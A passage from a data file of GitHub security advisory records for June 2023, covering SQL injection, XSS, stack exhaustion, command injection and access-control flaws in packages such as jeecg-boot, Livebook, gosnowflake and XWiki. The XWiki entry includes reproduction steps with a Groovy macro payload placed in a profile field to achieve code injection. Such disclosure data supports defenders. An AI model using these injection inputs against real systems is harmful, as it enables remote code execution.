'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2121'}, {'type': 'WEB', 'url': 'https://discuss.hashicorp.com/t/hcsec-2023-17-vault-s-kv-diff-viewer-allowed-html-injection/54814'}, {'type': 'PACKAGE', 'url': 'https://github.com/hashicorp/vault'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-09T22:40:33Z', 'nvd_published_at': None}" 1.4.0,GHSA-934g-fvcc-4833,2023-06-27T18:38:11Z,2023-06-16T18:30:33Z,,['CVE-2023-34659'],jeecg-boot SQL injection vulnerability,jeecg-boot 3.5.0 and 3.5.1 have a SQL injection vulnerability the `id` parameter of the `/jeecg-boot/jmreport/show` interface.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jeecgframework.boot:jeecg-boot-parent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.5.0'}, {'last_affected': '3.5.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34659'}, {'type': 'WEB', 'url': 'https://github.com/jeecgboot/jeecg-boot/issues/4976'}, {'type': 'PACKAGE', 'url': 'https://github.com/jeecgboot/jeecg-boot'}]","{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-16T20:27:35Z', 'nvd_published_at': None}" 1.4.0,GHSA-29mf-62xx-28jq,2023-06-06T01:58:41Z,2023-06-06T01:58:41Z,,[],buffered-reader vulnerable to out-of-bounds array access leading to panic,"Affected versions of the crate have a bug where attacker-controlled input can result in the use of an out-of-bound array index. Rust detects the use of the out-of-bound index and causes the application to panic. An attacker may be able to use this to cause a denial-of-service. However, it is not possible for an attacker to read from or write to the application's address space. ",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'buffered-reader'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.2'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'buffered-reader'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.1.0'}, {'fixed': '1.1.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-25mx-8f3v-8wh7'}, {'type': 'PACKAGE', 'url': 'https://gitlab.com/sequoia-pgp/sequoia'}, {'type': 'WEB', 'url': 'https://gitlab.com/sequoia-pgp/sequoia/-/blob/main/buffered-reader/NEWS'}, {'type': 'WEB', 'url': 'https://lists.sequoia-pgp.org/hyperkitty/list/announce@lists.sequoia-pgp.org/thread/SN2E3QRT4DMQ5JNEK6VIN6DJ5SH766DI/'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2023-0039.html'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T01:58:41Z', 'nvd_published_at': None}" 1.4.0,GHSA-5wfc-hjrc-gq87,2023-06-27T20:20:39Z,2023-06-14T15:30:38Z,,['CVE-2023-34620'],hjson stack exhaustion vulnerability,An issue was discovered hjson through 3.0.0 allows attackers to cause a denial of service or other unspecified impacts via crafted objects that deeply nested structures.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.hjson:hjson'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34620'}, {'type': 'WEB', 'url': 'https://github.com/hjson/hjson-java/issues/24'}]","{'cwe_ids': ['CWE-400', 'CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-14T20:38:48Z', 'nvd_published_at': None}" 1.4.0,GHSA-gpv5-7x3g-ghjv,2023-06-15T19:05:13Z,2023-06-15T19:05:13Z,,[],fast-xml-parser regex vulnerability patch could be improved from a safety perspective,"### Summary This is a comment on https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-6w63-h3fj-q4vw and the patches fixing it. ### Details The code which validates a name calls the validator: https://github.com/NaturalIntelligence/fast-xml-parser/blob/ecf6016f9b48aec1a921e673158be0773d07283e/src/xmlparser/DocTypeReader.js#L145-L153 This checks for the presence of an invalid character. Such an approach is always risky, as it is so easy to forget to include an invalid character in the list. A safer approach is to validate entity names against the XML specification: https://www.w3.org/TR/xml11/#sec-common-syn - an ENTITY name is a Name: ``` [4] NameStartChar ::= "":"" | [A-Z] | ""_"" | [a-z] | [#xC0-#xD6] | [#xD8-#xF6] | [#xF8-#x2FF] | [#x370-#x37D] | [#x37F-#x1FFF] | [#x200C-#x200D] | [#x2070-#x218F] | [#x2C00-#x2FEF] | [#x3001-#xD7FF] | [#xF900-#xFDCF] | [#xFDF0-#xFFFD] | [#x10000-#xEFFFF] [4a] NameChar ::= NameStartChar | ""-"" | ""."" | [0-9] | #xB7 | [#x0300-#x036F] | [#x203F-#x2040] [5] Name ::= NameStartChar (NameChar)* ``` so the safest way to validate an entity name is to build a regex to represent this expression and check whether the name given matches the regex. (Something along the lines of `/^[name start char class][name char class]*$/`.) There's probably a nice way to simplify the explicit list rather than typing it out verbatim using Unicode character properties, but I don't know enough to do so.",[],"[{'package': {'ecosystem': 'npm', 'name': 'fast-xml-parser'}, 'ecosystem_specific': {'affected_functions': ['fast-xml-parser.XMLParser']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.2.4'}, {'fixed': '4.2.5'}]}], 'versions': ['4.2.4']}]","[{'type': 'WEB', 'url': 'https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-6w63-h3fj-q4vw'}, {'type': 'WEB', 'url': 'https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-gpv5-7x3g-ghjv'}, {'type': 'WEB', 'url': 'https://github.com/NaturalIntelligence/fast-xml-parser/commit/9a880b887916855c3a510869fd1ee268d7fe58b1'}, {'type': 'PACKAGE', 'url': 'https://github.com/NaturalIntelligence/fast-xml-parser'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-06-15T19:05:13Z', 'nvd_published_at': None}" 1.4.0,GHSA-564w-97r7-c6p9,2023-06-22T17:26:28Z,2023-06-21T22:07:37Z,,['CVE-2023-35174'],Livebook Desktop's protocol handler can be exploited to execute arbitrary command on Windows,"On Windows, it is possible to open a `livebook://` link from a browser which opens Livebook Desktop and triggers arbitrary code execution on victim's machine. Any user using Livebook Desktop on Windows is potentially vulnerable to arbitrary code execution when they expect Livebook to be opened from browser. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L'}]","[{'package': {'ecosystem': 'Hex', 'name': 'livebook'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.8.0'}, {'fixed': '0.8.2'}]}]}, {'package': {'ecosystem': 'Hex', 'name': 'livebook'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.9.0'}, {'fixed': '0.9.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/livebook-dev/livebook/security/advisories/GHSA-564w-97r7-c6p9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35174'}, {'type': 'WEB', 'url': 'https://github.com/livebook-dev/livebook/commit/2e11b59f677c6ed3b6aa82dad412a8b3406ffdf1'}, {'type': 'WEB', 'url': 'https://github.com/livebook-dev/livebook/commit/beb10daaadcc765f0380e436bd7cd5f74cf086c8'}, {'type': 'PACKAGE', 'url': 'https://github.com/livebook-dev/livebook'}, {'type': 'WEB', 'url': 'https://github.com/livebook-dev/livebook/releases/tag/v0.8.2'}, {'type': 'WEB', 'url': 'https://github.com/livebook-dev/livebook/releases/tag/v0.9.3'}]","{'cwe_ids': ['CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-21T22:07:37Z', 'nvd_published_at': None}" 1.4.0,GHSA-w5w5-2882-47pc,2023-06-30T22:13:02Z,2023-06-30T22:13:02Z,,[],github.com/cosmos/cosmos-sdk's x/crisis does not charge ConstantFee,"# x/crisis does not charge ConstantFee ### Impact If a transaction is sent to the `x/crisis` module to check an invariant, the ConstantFee parameter of the chain is NOT charged. All versions of the `x/crisis` module are affected on all versions of the Cosmos SDK. ### Details The `x/crisis` module is supposed to allow anyone to halt a chain in the event of a violated invariant by sending a `MsgVerifyInvariant` with the name of the invariant. Processing this message takes extra processing power hence a `ConstantFee` was introduced on the chain that is charged as extra from the reporter for the extra computational work. This is supposed to avert spammers on the chain making nodes do extra computations using this transaction. By not charging the `ConstantFee`, the transactions related to invariant checking are relatively cheaper compared to the computational need and other transactions. That said, the submitter still has to pay the transaction fee to put the transaction on the network, hence using this weakness for spamming is limited by the usual mechanisms. Synthetic testing showed up to a 20% increase in CPU usage on a validator node that is spammed by hundreds of `MsgVerifyInvariant` messages which still makes this an expensive operation to carry out on a live blockchain network. ### Patches The `ConstantFee` charge of the `x/crisis` module will either be fixed or disabled in an upcoming regular release of the Cosmos SDK. The `x/crisis` module was originally intended to allow chains to halt rather than continue with some unknown behavior in the case of an invariant violation (safety over liveness). However, as chains mature, and especially as the potential [cost of halting increases](https://github.com/osmosis-labs/osmosis/issues/570), chains should consider carefully what invariants they really want to halt for, and what invariants are just sort of helpful sanity checks. The SDK team is working on new modules that allow chain developers to fine-tune the chain invariants and the necessary actions. Hence, the decision was made that the `x/crisis` module will be deprecated when new modules take over its responsibilities. ### Workarounds There is no workaround posted. Validators are advised to leave some extra computing room on their servers for possible spamming scenarios. (This is a good measure in any case.) ### References SDK developer epic about invariant checking: https://github.com/cosmos/cosmos-sdk/issues/15706 ",[],"[{'package': {'ecosystem': 'Go', 'name': 'github.com/cosmos/cosmos-sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.50.0-alpha.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/cosmos/cosmos-sdk/security/advisories/GHSA-w5w5-2882-47pc'}, {'type': 'WEB', 'url': 'https://github.com/cosmos/cosmos-sdk/issues/15706'}, {'type': 'PACKAGE', 'url': 'https://github.com/cosmos/cosmos-sdk'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T22:13:02Z', 'nvd_published_at': None}" 1.4.0,GHSA-w44m-8mv2-v78h,2023-06-22T20:01:48Z,2023-06-22T20:01:48Z,,[],"Cosmos ""Barberry"" vulnerability in github.com/cosmos/cosmos-sdk","The cosmos-sdk module is affected by the vulnerability codenamed ""Barberry"".",[],"[{'package': {'ecosystem': 'Go', 'name': 'github.com/cosmos/cosmos-sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.46.0'}, {'fixed': '0.46.13'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/cosmos/cosmos-sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.47.0'}, {'fixed': '0.47.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/cosmos/cosmos-sdk/pull/16466'}, {'type': 'WEB', 'url': 'https://forum.cosmos.network/t/cosmos-sdk-security-advisory-barberry/10825'}, {'type': 'PACKAGE', 'url': 'https://github.com/cosmos/cosmos-sdk'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-22T20:01:48Z', 'nvd_published_at': None}" 1.4.0,GHSA-77fw-rf4v-vfp9,2023-06-21T22:00:18Z,2023-06-21T22:00:18Z,,['CVE-2017-16897'],passport-wsfed-saml2 vulnerable to Signature Bypass in SAML2 token,"## Information Please note that this is not a new disclosure, and is previously reported in our [SECURITY-NOTICE.md](https://github.com/auth0/passport-wsfed-saml2/commit/520b9fc0bb4249ce83bec47e30153419f086ab70 ) which we removed in favor of github advisory. # Overview This vulnerability allows an attacker to impersonate another user and potentially elevate their privileges if the SAML identity provider: - signs SAML response and signs assertion - does not sign SAML response and signs assertion # Am I affected? You may be affected if you use SAML2 protocol with passport-wsfed-saml2 versions below 3.0.5 and your SAML identity Provider: 1. signs SAML response and signs assertion; or 2. does not sign SAML response and signs assertion # How do I fix it? You may fix this vulnerability by upgrading your library to version 3.0.5 or above. # Will the fix impact my users? This fix patches the library that your application runs, but will not impact your users, their current state, or any existing sessions.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'passport-wsfed-saml2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/auth0/passport-wsfed-saml2/security/advisories/GHSA-77fw-rf4v-vfp9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16897'}, {'type': 'WEB', 'url': 'https://github.com/auth0/passport-wsfed-saml2/commit/520b9fc0bb4249ce83bec47e30153419f086ab70'}, {'type': 'WEB', 'url': 'https://auth0.com/docs/security/bulletins/cve-2017-16897'}, {'type': 'PACKAGE', 'url': 'https://github.com/auth0/passport-wsfed-saml2'}]","{'cwe_ids': ['CWE-290'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-21T22:00:18Z', 'nvd_published_at': None}" 1.4.0,GHSA-h65h-v7fw-4p38,2023-09-29T16:13:11Z,2023-06-09T23:23:42Z,,['CVE-2019-12291'],HashiCorp Consul Incorrect Access Control vulnerability,"HashiCorp Consul 1.4.0 through 1.5.0 has Incorrect Access Control. Keys not matching a specific ACL rule used for prefix matching in a policy can be deleted by a token using that policy even with default deny settings configured. ### Specific Go Packages Affected github.com/hashicorp/consul/acl","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/consul'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.0'}, {'fixed': '1.5.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-12291'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/consul/issues/5888'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/consul/commit/36ebca1fd0129278487c6570449bc8cc03987890'}, {'type': 'PACKAGE', 'url': 'https://github.com/hashicorp/consul'}, {'type': 'WEB', 'url': 'https://www.hashicorp.com/blog/category/consul'}]","{'cwe_ids': ['CWE-284'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-09T23:23:42Z', 'nvd_published_at': None}" 1.4.0,GHSA-5m3m-q8cq-77g4,2023-06-28T16:32:04Z,2023-06-22T15:30:24Z,,['CVE-2023-36097'],fuadmin vulnerable to insecure file upload,funadmin v3.3.2 and v3.3.3 are vulnerable to insecure file upload via the plugins install.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'funadmin/funadmin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.3.2'}, {'last_affected': '3.3.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-36097'}, {'type': 'WEB', 'url': 'https://github.com/funadmin/funadmin/issues/17'}, {'type': 'PACKAGE', 'url': 'https://github.com/funadmin/funadmin'}]","{'cwe_ids': ['CWE-434'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-22T20:01:31Z', 'nvd_published_at': None}" 1.4.0,GHSA-fwv2-65wh-2w8c,2023-06-09T22:53:25Z,2023-06-09T22:53:25Z,,['CVE-2023-34231'],Snowflake Golang Driver vulnerable to Command Injection,"### Issue Snowflake was informed via our bug bounty program of a command injection vulnerability in the Snowflake Golang driver via SSO browser URL authentication. ### Impacted driver package: gosnowflake ### Impacted version range: before [Version 1.6.19](https://community.snowflake.com/s/article/Go-Snowflake-Driver-Release-Notes) ### Attack Scenario In order to exploit the potential for command injection, an attacker would need to be successful in (1) establishing a malicious resource and (2) redirecting users to utilize the resource. The attacker could set up a malicious, publicly accessible server which responds to the SSO URL with an attack payload. If the attacker then tricked a user into visiting the maliciously crafted connection URL, the user’s local machine would render the malicious payload, leading to a remote code execution. This attack scenario can be mitigated through URL whitelisting as well as common anti-phishing resources. ### Solution On March 21, 2023, Snowflake merged a patch that fixed a command injection vulnerability in the Snowflake Golang driver via SSO browser URL authentication. The vulnerability affected the Snowflake Golang driver before Version 1.6.19. We strongly recommend users upgrade to Version 1.6.19 as soon as possible via the following resources: [Go Snowflake Driver](https://docs.snowflake.com/en/developer-guide/golang/go-driver) ### Additional Information If you discover a security vulnerability in one of our products or websites, please report the issue to HackerOne. For more information, please see our [Vulnerability Disclosure Policy](https://hackerone.com/snowflake?type=team).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/snowflakedb/gosnowflake'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.19'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/snowflakedb/gosnowflake/security/advisories/GHSA-fwv2-65wh-2w8c'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34231'}, {'type': 'WEB', 'url': 'https://github.com/snowflakedb/gosnowflake/pull/757'}, {'type': 'WEB', 'url': 'https://github.com/snowflakedb/gosnowflake/commit/e11a2a555f1b9f7adc1f01fb7b5e7f38fbbb2a1c'}, {'type': 'PACKAGE', 'url': 'https://github.com/snowflakedb/gosnowflake'}]","{'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-09T22:53:25Z', 'nvd_published_at': None}" 1.4.0,GHSA-v6g2-jwrm-h5r5,2023-06-30T20:37:16Z,2023-06-30T03:30:17Z,,['CVE-2023-3469'],phpMyFAQ Cross-site Scripting,"phpMyFAQ prior to 3.2.0-beta.2 contains a cross-site scripting vulnerability. When an administrator restores a backup from a file, it's possible to trigger an error with a specially crafted file that can be displayed on the web page. Since the error message contains the invalid part of the file, any JavaScript code in the file is executed.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'thorsten/phpmyfaq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.2.0-beta.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3469'}, {'type': 'WEB', 'url': 'https://github.com/thorsten/phpmyfaq/commit/04a0183c25dd425f4c2bfb5f75b7650b932ae278'}, {'type': 'PACKAGE', 'url': 'https://github.com/thorsten/phpMyFAQ'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/3565cfc9-82c4-4db8-9b8f-494dd81b56ca'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T20:37:16Z', 'nvd_published_at': None}" 1.4.0,GHSA-7hh3-3x64-v2g9,2023-06-26T13:55:41Z,2023-06-20T18:50:15Z,,['CVE-2023-35167'],"When setting EntityOptions.apiPrefilter to a function, the filter is not applied to API requests for a resource by Id","### Impact If you used the [apiPrefilter](https://remult.dev/docs/ref_entity.html#apiprefilter) option of the `@Entity` decorator, by setting it to a function that returns a filter that prevents unauthorized access to data, an attacker who knows the `id` of an entity instance she is not authorized to access, can gain read, update and delete access to it. ### Patches The issue is fixed in version 0.20.6 ### Workarounds Set the `apiPrefilter` option to a filter object instead of a function. ### References If you're using a minor version < 0.20 and require a patch, please create an issue.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'remult'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.20.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/remult/remult/security/advisories/GHSA-7hh3-3x64-v2g9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35167'}, {'type': 'WEB', 'url': 'https://github.com/remult/remult/commit/6892ae97134126d8710ef7302bb2fc37730994c5'}, {'type': 'PACKAGE', 'url': 'https://github.com/remult/remult'}, {'type': 'WEB', 'url': 'https://github.com/remult/remult/releases/tag/v0.20.6'}]","{'cwe_ids': ['CWE-284'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-20T18:50:15Z', 'nvd_published_at': None}" 1.4.0,GHSA-hxq4-mx37-fqvg,2023-06-30T22:11:42Z,2023-06-30T22:11:42Z,,[],s2n-quic potential denial of service vulnerability when receiving empty UDP packets,"### Impact An issue in s2n-quic results in the endpoint shutting down after receiving an empty UDP packet on a connection. No AWS services are affected by this issue and customers of AWS services do not need to take action. Applications using s2n-quic should upgrade their application to the most recent release of s2n-quic. Impacted version: s2n-quic v1.22.0. ### Patches The patch is included in s2n-quic [v1.23.0](https://github.com/aws/s2n-quic/releases/tag/v1.23.0). If you have any questions or comments about this advisory we ask that you contact AWS/Amazon Security via our [vulnerability reporting page](https://aws.amazon.com/security/vulnerability-reporting) or directly via email to [aws-security@amazon.com](mailto:aws-security@amazon.com). Please do not create a public GitHub issue. ",[],"[{'package': {'ecosystem': 'crates.io', 'name': 's2n-quic'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.22.0'}, {'fixed': '1.23.0'}]}], 'versions': ['1.22.0']}]","[{'type': 'WEB', 'url': 'https://github.com/aws/s2n-quic/security/advisories/GHSA-hxq4-mx37-fqvg'}, {'type': 'WEB', 'url': 'https://github.com/aws/s2n-quic/commit/4b1d417e9de7eafaf5350553c5fcb9264dfa32f5'}, {'type': 'PACKAGE', 'url': 'https://github.com/aws/s2n-quic'}, {'type': 'WEB', 'url': 'https://github.com/aws/s2n-quic/releases/tag/v1.23.0'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T22:11:42Z', 'nvd_published_at': None}" 1.4.0,GHSA-89qm-hm2x-mxm3,2023-06-12T18:53:32Z,2023-06-12T06:30:17Z,,['CVE-2023-26133'],progressbar.js vulnerable to Prototype Pollution,"All versions of the package progressbar.js are vulnerable to Prototype Pollution via the function extend() in the file utils.js. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'progressbar.js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26133'}, {'type': 'PACKAGE', 'url': 'https://github.com/kimmobrunfeldt/progressbar.js'}, {'type': 'WEB', 'url': 'https://github.com/kimmobrunfeldt/progressbar.js/blob/74536b9eeeaaf51144706d918ed5a0a679631d96/src/utils.js#L18'}, {'type': 'WEB', 'url': 'https://github.com/kimmobrunfeldt/progressbar.js/blob/74536b9eeeaaf51144706d918ed5a0a679631d96/src/utils.js#L20'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-PROGRESSBARJS-3184152'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-12T18:53:32Z', 'nvd_published_at': None}" 1.4.0,GHSA-mx27-gg24-h2jc,2023-06-27T19:48:46Z,2023-06-14T15:30:38Z,,['CVE-2023-34612'],ph-json vulnerable to stack exhaustion,An issue was discovered in ph-json that allows attackers to cause a denial of service or other unspecified impacts via crafted objects that have deeply nested structures.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.helger.commons:ph-json'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '11.0.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34612'}, {'type': 'WEB', 'url': 'https://github.com/phax/ph-commons/issues/35'}, {'type': 'PACKAGE', 'url': 'https://github.com/phax/ph-commons'}]","{'cwe_ids': ['CWE-400', 'CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-14T21:09:37Z', 'nvd_published_at': None}" 1.4.0,GHSA-298m-hvgh-x9cw,2023-06-27T21:59:30Z,2023-06-20T15:31:09Z,,['CVE-2020-21485'],Alluxio Cross Site Scripting vulnerability,Cross Site Scripting vulnerability in Alluxio v.1.8.1 allows a remote attacker to executea arbitrary code via the path parameter in the browse board component.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.alluxio:alluxio-parent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.8.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-21485'}, {'type': 'WEB', 'url': 'https://github.com/Alluxio/alluxio/issues/10552'}, {'type': 'PACKAGE', 'url': 'https://github.com/Alluxio/alluxio'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-21T22:09:49Z', 'nvd_published_at': None}" 1.4.0,GHSA-jv4x-j47q-6qvp,2023-06-26T22:11:47Z,2023-06-14T15:30:38Z,,['CVE-2023-34624'],htmlcleaner vulnerable to stack exhaustion,An issue was discovered htmlcleaner through version 2.28 allows attackers to cause a denial of service or other unspecified impacts via crafted objects that deeply nested structures.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'net.sourceforge.htmlcleaner:htmlcleaner'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.28'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34624'}, {'type': 'WEB', 'url': 'https://github.com/amplafi/htmlcleaner/issues/13'}, {'type': 'PACKAGE', 'url': 'https://github.com/amplafi/htmlcleaner'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/08/msg00007.html'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2023/dsa-5471'}]","{'cwe_ids': ['CWE-400', 'CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-14T21:01:31Z', 'nvd_published_at': None}" 1.4.0,GHSA-94pf-92hw-2hjc,2023-06-30T20:42:02Z,2023-06-30T20:42:02Z,,['CVE-2023-36469'],XWiki Platform vulnerable to Code injection through NotificationRSSService,"### Impact Any user who can edit their own user profile and notification settings can execute arbitrary script macros including Groovy and Python macros that allow remote code execution including unrestricted read and write access to all wiki contents. This can be reproduced with the following steps: 1. Login as a user without script or programming right. 2. Go to the notifications preferences in your user profile. 3. Disable the ""Own Events Filter"" and enable notifications in the notification menu for ""Like"". 4. Set your first name to `{{cache id=""security"" timeToLive=""1""}}{{groovy}}println(""Hello from groovy!""){{/groovy}}{{/cache}}` 5. Click on the like button at the bottom left of the user profile. 6. Click on the notifications bell in the top bar and then on ""RSS Feed"". If the text ""Profile of Hello from groovy!"" and/or ""liked by Hello from groovy!"" is displayed, the attack succeeded. The expected result would have been that the entered first name is displayed as-is in the description of the feed. ### Patches This has been patched in XWiki 14.10.6 and 15.2RC1. ### Workarounds The main security fix can be manually applied by patching the affected document `XWiki.Notifications.Code.NotificationRSSService` as shown in the [patch](https://github.com/xwiki/xwiki-platform/commit/217e5bb7a657f2991b154a16ef4d5ae9c29ad39c#diff-7221a548809fa2ba34348556f4b5bd436463c559ebdf691197932ee7ce4478ca). This will break the link to the differences, though as this requires additional changes to Velocity templates as shown in the patch. While the [default](https://github.com/xwiki/xwiki-platform/commit/217e5bb7a657f2991b154a16ef4d5ae9c29ad39c#diff-b261c6eac3108c3e6e734054c28a78f59d3439ab72fe8582dadf87670a0d15a4) template is available in the instance and can be easily patched, the template for mentions is contained in a `.jar`-file and thus cannot be fixed without replacing that jar. ### References * https://jira.xwiki.org/browse/XWIKI-20610 * https://github.com/xwiki/xwiki-platform/commit/217e5bb7a657f2991b154a16ef4d5ae9c29ad39c ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-notifications-ui'}, 'ranges': 